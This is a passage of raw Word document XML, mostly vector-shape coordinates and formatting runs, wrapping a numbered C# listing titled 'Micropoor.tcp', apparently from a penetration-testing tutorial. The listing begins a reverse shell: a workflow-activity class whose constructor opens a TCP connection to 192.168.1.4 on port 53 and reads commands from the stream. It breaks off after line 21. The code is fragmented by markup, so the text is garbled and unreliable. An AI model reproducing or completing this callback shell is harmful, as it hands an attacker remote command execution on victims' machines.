6267,13030,6267,13029,6267,13028,6267,13027,6267,13025,6267,13024,6267,13023,6267,13021,6267,13019,6267,13018,6267,13016,6267,13014,6267,13013,6267,13011,6267,13009,6267,13007,6267,13005,6267,13003,6267,13001,6267,12999,6267,12996,6267,12994,6267,12992,6267,12989,6267,12987,6267,12984,6267,12981,6267,12979,6267,12976,6267,12973,6267,12970,6267,12967,6267,12964,6267,12961,6267,12958,6267,12954,6267,12951,6267,12947,6267,12944,6267,12940,6267,12936,6267,12933,6267,12929,6267,12925,6267,12921,6267,12917,6267,12912,6267,12908,6267,12904,6267,12899,6267,12895,6267,12890,6267,12885,6267,12880,6267,12875,6267,12870,6267,12865,6267,12860,6267,12855,6267,12849,6267,12844,6267,12838,6267,12832,6267,12826,6267,12820,6267,12814,6267,12808,6267,12802,6267,12795e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.500pt;margin-top:657.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6250,13150" coordsize="130,270">
        <v:shape style="position:absolute;left:6250;top:13150;width:130;height:270" coordorigin="6250,13150" coordsize="130,270" path="m6267,13171l6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6267,13171,6268,13171,6268,13171,6268,13171,6268,13171,6268,13171,6268,13171,6268,13171,6268,13171,6268,13171,6268,13171,6269,13171,6269,13171,6269,13171,6269,13171,6269,13171,6269,13171,6270,13171,6270,13171,6270,13171,6270,13171,6271,13171,6271,13171,6271,13171,6272,13171,6272,13171,6272,13171,6273,13171,6273,13171,6274,13171,6274,13171,6275,13171,6275,13171,6276,13171,6276,13171,6277,13171,6277,13171,6278,13171,6278,13171,6279,13171,6280,13171,6280,13171,6281,13171,6282,13171,6283,13171,6283,13171,6284,13171,6285,13171,6286,13171,6287,13171,6288,13171,6289,13171,6290,13171,6291,13171,6292,13171,6293,13171,6294,13171,6295,13171,6296,13171,6297,13171,6298,13171,6300,13171,6301,13171,6302,13171,6304,13171,6305,13171,6306,13171,6308,13171,6309,13171,6311,13171,6312,13171,6314,13171,6316,13171,6317,13171,6319,13171,6321,13171,6323,13171,6324,13171,6326,13171,6328,13171,6330,13171,6332,13171,6334,13171,6336,13171,6338,13171,6341,13171,6343,13171,6345,13171,6347,13171,6350,13171,6352,13171,6354,13171,6357,13171,6359,13171,6362,13171,6365,13171,6367,13171,6370,13171,6373,13171,6376,13171,6378,13171,6381,13171,6384,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13171,6387,13172,6387,13172,6387,13172,6387,13172,6387,13172,6387,13172,6387,13173,6387,13173,6387,13173,6387,13174,6387,13174,6387,13174,6387,13175,6387,13175,6387,13176,6387,13176,6387,13177,6387,13177,6387,13178,6387,13178,6387,13179,6387,13180,6387,13180,6387,13181,6387,13182,6387,13183,6387,13184,6387,13184,6387,13185,6387,13186,6387,13187,6387,13188,6387,13190,6387,13191,6387,13192,6387,13193,6387,13194,6387,13196,6387,13197,6387,13199,6387,13200,6387,13202,6387,13203,6387,13205,6387,13207,6387,13208,6387,13210,6387,13212,6387,13214,6387,13216,6387,13218,6387,13220,6387,13223,6387,13225,6387,13227,6387,13230,6387,13232,6387,13235,6387,13237,6387,13240,6387,13242,6387,13245,6387,13248,6387,13251,6387,13254,6387,13257,6387,13260,6387,13264,6387,13267,6387,13270,6387,13274,6387,13277,6387,13281,6387,13285,6387,13289,6387,13292,6387,13296,6387,13300,6387,13305,6387,13309,6387,13313,6387,13318,6387,13322,6387,13327,6387,13331,6387,13336,6387,13341,6387,13346,6387,13351,6387,13356,6387,13361,6387,13367,6387,13372,6387,13378,6387,13383,6387,13389,6387,13395,6387,13401,6387,13407,6387,13413,6387,13419,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6386,13426,6386,13426,6386,13426,6386,13426,6386,13426,6386,13426,6386,13426,6385,13426,6385,13426,6385,13426,6385,13426,6385,13426,6384,13426,6384,13426,6384,13426,6384,13426,6383,13426,6383,13426,6383,13426,6382,13426,6382,13426,6382,13426,6381,13426,6381,13426,6380,13426,6380,13426,6379,13426,6379,13426,6378,13426,6378,13426,6377,13426,6377,13426,6376,13426,6375,13426,6375,13426,6374,13426,6373,13426,6373,13426,6372,13426,6371,13426,6370,13426,6369,13426,6369,13426,6368,13426,6367,13426,6366,13426,6365,13426,6364,13426,6363,13426,6362,13426,6361,13426,6360,13426,6358,13426,6357,13426,6356,13426,6355,13426,6353,13426,6352,13426,6351,13426,6349,13426,6348,13426,6346,13426,6345,13426,6343,13426,6342,13426,6340,13426,6339,13426,6337,13426,6335,13426,6334,13426,6332,13426,6330,13426,6328,13426,6326,13426,6324,13426,6322,13426,6320,13426,6318,13426,6316,13426,6314,13426,6312,13426,6309,13426,6307,13426,6305,13426,6302,13426,6300,13426,6297,13426,6295,13426,6292,13426,6290,13426,6287,13426,6284,13426,6282,13426,6279,13426,6276,13426,6273,13426,6270,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13424,6267,13424,6267,13424,6267,13424,6267,13423,6267,13423,6267,13423,6267,13422,6267,13422,6267,13422,6267,13421,6267,13421,6267,13420,6267,13420,6267,13419,6267,13419,6267,13418,6267,13417,6267,13417,6267,13416,6267,13415,6267,13415,6267,13414,6267,13413,6267,13412,6267,13411,6267,13410,6267,13409,6267,13408,6267,13407,6267,13406,6267,13404,6267,13403,6267,13402,6267,13401,6267,13399,6267,13398,6267,13396,6267,13395,6267,13393,6267,13391,6267,13390,6267,13388,6267,13386,6267,13384,6267,13382,6267,13380,6267,13378,6267,13376,6267,13374,6267,13372,6267,13369,6267,13367,6267,13364,6267,13362,6267,13359,6267,13357,6267,13354,6267,13351,6267,13348,6267,13345,6267,13342,6267,13339,6267,13336,6267,13333,6267,13329,6267,13326,6267,13323,6267,13319,6267,13315,6267,13312,6267,13308,6267,13304,6267,13300,6267,13296,6267,13292,6267,13288,6267,13283,6267,13279,6267,13274,6267,13270,6267,13265,6267,13260,6267,13255,6267,13251,6267,13245,6267,13240,6267,13235,6267,13230,6267,13224,6267,13219,6267,13213,6267,13207,6267,13201,6267,13196,6267,13189,6267,13183,6267,13177,6267,13171e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:234.500pt;margin-top:675.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4690,13510" coordsize="130,270">
        <v:shape style="position:absolute;left:4690;top:13510;width:130;height:270" coordorigin="4690,13510" coordsize="130,270" path="m4706,13531l4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4708,13531,4708,13531,4708,13531,4708,13531,4708,13531,4708,13531,4709,13531,4709,13531,4709,13531,4709,13531,4710,13531,4710,13531,4710,13531,4711,13531,4711,13531,4711,13531,4712,13531,4712,13531,4712,13531,4713,13531,4713,13531,4714,13531,4714,13531,4715,13531,4715,13531,4716,13531,4716,13531,4717,13531,4718,13531,4718,13531,4719,13531,4720,13531,4720,13531,4721,13531,4722,13531,4723,13531,4723,13531,4724,13531,4725,13531,4726,13531,4727,13531,4728,13531,4729,13531,4730,13531,4731,13531,4732,13531,4733,13531,4734,13531,4735,13531,4736,13531,4738,13531,4739,13531,4740,13531,4741,13531,4743,13531,4744,13531,4746,13531,4747,13531,4749,13531,4750,13531,4752,13531,4753,13531,4755,13531,4757,13531,4758,13531,4760,13531,4762,13531,4764,13531,4766,13531,4767,13531,4769,13531,4771,13531,4773,13531,4776,13531,4778,13531,4780,13531,4782,13531,4784,13531,4787,13531,4789,13531,4791,13531,4794,13531,4796,13531,4799,13531,4801,13531,4804,13531,4806,13531,4809,13531,4812,13531,4815,13531,4818,13531,4820,13531,4823,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13532,4826,13532,4826,13532,4826,13532,4826,13532,4826,13532,4826,13533,4826,13533,4826,13533,4826,13533,4826,13534,4826,13534,4826,13535,4826,13535,4826,13535,4826,13536,4826,13536,4826,13537,4826,13537,4826,13538,4826,13538,4826,13539,4826,13540,4826,13541,4826,13541,4826,13542,4826,13543,4826,13544,4826,13545,4826,13546,4826,13547,4826,13548,4826,13549,4826,13550,4826,13551,4826,13552,4826,13553,4826,13555,4826,13556,4826,13557,4826,13559,4826,13560,4826,13562,4826,13564,4826,13565,4826,13567,4826,13569,4826,13571,4826,13572,4826,13574,4826,13576,4826,13578,4826,13581,4826,13583,4826,13585,4826,13587,4826,13590,4826,13592,4826,13595,4826,13597,4826,13600,4826,13603,4826,13605,4826,13608,4826,13611,4826,13614,4826,13617,4826,13621,4826,13624,4826,13627,4826,13631,4826,13634,4826,13638,4826,13641,4826,13645,4826,13649,4826,13653,4826,13657,4826,13661,4826,13665,4826,13669,4826,13673,4826,13678,4826,13682,4826,13687,4826,13691,4826,13696,4826,13701,4826,13706,4826,13711,4826,13716,4826,13722,4826,13727,4826,13732,4826,13738,4826,13744,4826,13749,4826,13755,4826,13761,4826,13767,4826,13773,4826,13780,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4825,13786,4825,13786,4825,13786,4825,13786,4825,13786,4825,13786,4825,13786,4824,13786,4824,13786,4824,13786,4824,13786,4823,13786,4823,13786,4823,13786,4823,13786,4822,13786,4822,13786,4822,13786,4821,13786,4821,13786,4820,13786,4820,13786,4819,13786,4819,13786,4819,13786,4818,13786,4818,13786,4817,13786,4816,13786,4816,13786,4815,13786,4815,13786,4814,13786,4813,13786,4813,13786,4812,13786,4811,13786,4810,13786,4809,13786,4809,13786,4808,13786,4807,13786,4806,13786,4805,13786,4804,13786,4803,13786,4802,13786,4801,13786,4800,13786,4799,13786,4798,13786,4796,13786,4795,13786,4794,13786,4793,13786,4791,13786,4790,13786,4789,13786,4787,13786,4786,13786,4784,13786,4783,13786,4781,13786,4780,13786,4778,13786,4776,13786,4774,13786,4773,13786,4771,13786,4769,13786,4767,13786,4765,13786,4763,13786,4761,13786,4759,13786,4757,13786,4755,13786,4753,13786,4751,13786,4749,13786,4746,13786,4744,13786,4742,13786,4739,13786,4737,13786,4734,13786,4732,13786,4729,13786,4726,13786,4724,13786,4721,13786,4718,13786,4715,13786,4712,13786,4709,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13785,4706,13785,4706,13785,4706,13785,4706,13785,4706,13785,4706,13785,4706,13784,4706,13784,4706,13784,4706,13784,4706,13783,4706,13783,4706,13783,4706,13782,4706,13782,4706,13781,4706,13781,4706,13781,4706,13780,4706,13779,4706,13779,4706,13778,4706,13778,4706,13777,4706,13776,4706,13776,4706,13775,4706,13774,4706,13773,4706,13772,4706,13771,4706,13770,4706,13769,4706,13768,4706,13767,4706,13766,4706,13765,4706,13763,4706,13762,4706,13761,4706,13759,4706,13758,4706,13756,4706,13755,4706,13753,4706,13752,4706,13750,4706,13748,4706,13746,4706,13744,4706,13742,4706,13740,4706,13738,4706,13736,4706,13734,4706,13732,4706,13729,4706,13727,4706,13725,4706,13722,4706,13719,4706,13717,4706,13714,4706,13711,4706,13708,4706,13705,4706,13702,4706,13699,4706,13696,4706,13693,4706,13690,4706,13686,4706,13683,4706,13679,4706,13676,4706,13672,4706,13668,4706,13664,4706,13660,4706,13656,4706,13652,4706,13648,4706,13643,4706,13639,4706,13635,4706,13630,4706,13625,4706,13621,4706,13616,4706,13611,4706,13606,4706,13600,4706,13595,4706,13590,4706,13584,4706,13579,4706,13573,4706,13567,4706,13562,4706,13556,4706,13550,4706,13543,4706,13537,4706,13531e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.500pt;margin-top:675.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4810,13510" coordsize="130,270">
        <v:shape style="position:absolute;left:4810;top:13510;width:130;height:270" coordorigin="4810,13510" coordsize="130,270" path="m4826,13531l4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4828,13531,4828,13531,4828,13531,4828,13531,4828,13531,4828,13531,4829,13531,4829,13531,4829,13531,4829,13531,4829,13531,4830,13531,4830,13531,4830,13531,4831,13531,4831,13531,4831,13531,4832,13531,4832,13531,4833,13531,4833,13531,4833,13531,4834,13531,4834,13531,4835,13531,4835,13531,4836,13531,4836,13531,4837,13531,4838,13531,4838,13531,4839,13531,4840,13531,4840,13531,4841,13531,4842,13531,4843,13531,4843,13531,4844,13531,4845,13531,4846,13531,4847,13531,4848,13531,4849,13531,4850,13531,4851,13531,4852,13531,4853,13531,4854,13531,4855,13531,4856,13531,4858,13531,4859,13531,4860,13531,4862,13531,4863,13531,4864,13531,4866,13531,4867,13531,4869,13531,4870,13531,4872,13531,4873,13531,4875,13531,4877,13531,4878,13531,4880,13531,4882,13531,4884,13531,4886,13531,4888,13531,4889,13531,4891,13531,4893,13531,4896,13531,4898,13531,4900,13531,4902,13531,4904,13531,4907,13531,4909,13531,4911,13531,4914,13531,4916,13531,4919,13531,4921,13531,4924,13531,4927,13531,4929,13531,4932,13531,4935,13531,4938,13531,4941,13531,4943,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13532,4946,13532,4946,13532,4946,13532,4946,13532,4946,13532,4946,13533,4946,13533,4946,13533,4946,13533,4946,13534,4946,13534,4946,13535,4946,13535,4946,13535,4946,13536,4946,13536,4946,13537,4946,13537,4946,13538,4946,13538,4946,13539,4946,13540,4946,13541,4946,13541,4946,13542,4946,13543,4946,13544,4946,13545,4946,13546,4946,13547,4946,13548,4946,13549,4946,13550,4946,13551,4946,13552,4946,13553,4946,13555,4946,13556,4946,13557,4946,13559,4946,13560,4946,13562,4946,13564,4946,13565,4946,13567,4946,13569,4946,13571,4946,13572,4946,13574,4946,13576,4946,13578,4946,13581,4946,13583,4946,13585,4946,13587,4946,13590,4946,13592,4946,13595,4946,13597,4946,13600,4946,13603,4946,13605,4946,13608,4946,13611,4946,13614,4946,13617,4946,13621,4946,13624,4946,13627,4946,13631,4946,13634,4946,13638,4946,13641,4946,13645,4946,13649,4946,13653,4946,13657,4946,13661,4946,13665,4946,13669,4946,13673,4946,13678,4946,13682,4946,13687,4946,13691,4946,13696,4946,13701,4946,13706,4946,13711,4946,13716,4946,13722,4946,13727,4946,13732,4946,13738,4946,13744,4946,13749,4946,13755,4946,13761,4946,13767,4946,13773,4946,13780,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4945,13786,4945,13786,4945,13786,4945,13786,4945,13786,4945,13786,4944,13786,4944,13786,4944,13786,4944,13786,4943,13786,4943,13786,4943,13786,4943,13786,4942,13786,4942,13786,4942,13786,4941,13786,4941,13786,4940,13786,4940,13786,4940,13786,4939,13786,4939,13786,4938,13786,4938,13786,4937,13786,4936,13786,4936,13786,4935,13786,4935,13786,4934,13786,4933,13786,4933,13786,4932,13786,4931,13786,4930,13786,4930,13786,4929,13786,4928,13786,4927,13786,4926,13786,4925,13786,4924,13786,4923,13786,4922,13786,4921,13786,4920,13786,4919,13786,4918,13786,4916,13786,4915,13786,4914,13786,4913,13786,4911,13786,4910,13786,4909,13786,4907,13786,4906,13786,4904,13786,4903,13786,4901,13786,4900,13786,4898,13786,4896,13786,4895,13786,4893,13786,4891,13786,4889,13786,4887,13786,4885,13786,4883,13786,4881,13786,4879,13786,4877,13786,4875,13786,4873,13786,4871,13786,4869,13786,4866,13786,4864,13786,4862,13786,4859,13786,4857,13786,4854,13786,4852,13786,4849,13786,4846,13786,4844,13786,4841,13786,4838,13786,4835,13786,4832,13786,4829,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13785,4826,13785,4826,13785,4826,13785,4826,13785,4826,13785,4826,13785,4826,13784,4826,13784,4826,13784,4826,13784,4826,13783,4826,13783,4826,13783,4826,13782,4826,13782,4826,13781,4826,13781,4826,13781,4826,13780,4826,13779,4826,13779,4826,13778,4826,13778,4826,13777,4826,13776,4826,13776,4826,13775,4826,13774,4826,13773,4826,13772,4826,13771,4826,13770,4826,13769,4826,13768,4826,13767,4826,13766,4826,13765,4826,13763,4826,13762,4826,13761,4826,13759,4826,13758,4826,13756,4826,13755,4826,13753,4826,13752,4826,13750,4826,13748,4826,13746,4826,13744,4826,13742,4826,13740,4826,13738,4826,13736,4826,13734,4826,13732,4826,13729,4826,13727,4826,13725,4826,13722,4826,13719,4826,13717,4826,13714,4826,13711,4826,13708,4826,13705,4826,13702,4826,13699,4826,13696,4826,13693,4826,13690,4826,13686,4826,13683,4826,13679,4826,13676,4826,13672,4826,13668,4826,13664,4826,13660,4826,13656,4826,13652,4826,13648,4826,13643,4826,13639,4826,13635,4826,13630,4826,13625,4826,13621,4826,13616,4826,13611,4826,13606,4826,13600,4826,13595,4826,13590,4826,13584,4826,13579,4826,13573,4826,13567,4826,13562,4826,13556,4826,13550,4826,13543,4826,13537,4826,13531e x" fillcolor="#fefefe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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>icropoor.tcp：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IO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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4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using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System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Diagnostics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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5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using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System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ComponentModel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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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Net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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7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using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System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Net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Sockets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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5871" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8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using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System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Workflow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Activities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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class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Program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: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SequentialWorkflowActivity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11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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5661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12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static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StreamWriter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streamWriter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;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13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="31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Program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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15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{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16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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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TcpClient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client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new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TcpClient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(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"192.168.1.4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14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53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)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17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{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18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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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Stream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stream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client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GetStream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(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)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19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{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20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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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StreamReader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rdr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new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StreamReader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stream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)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21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{</w:t>
      </w:r>
    </w:p>
    <w:p>
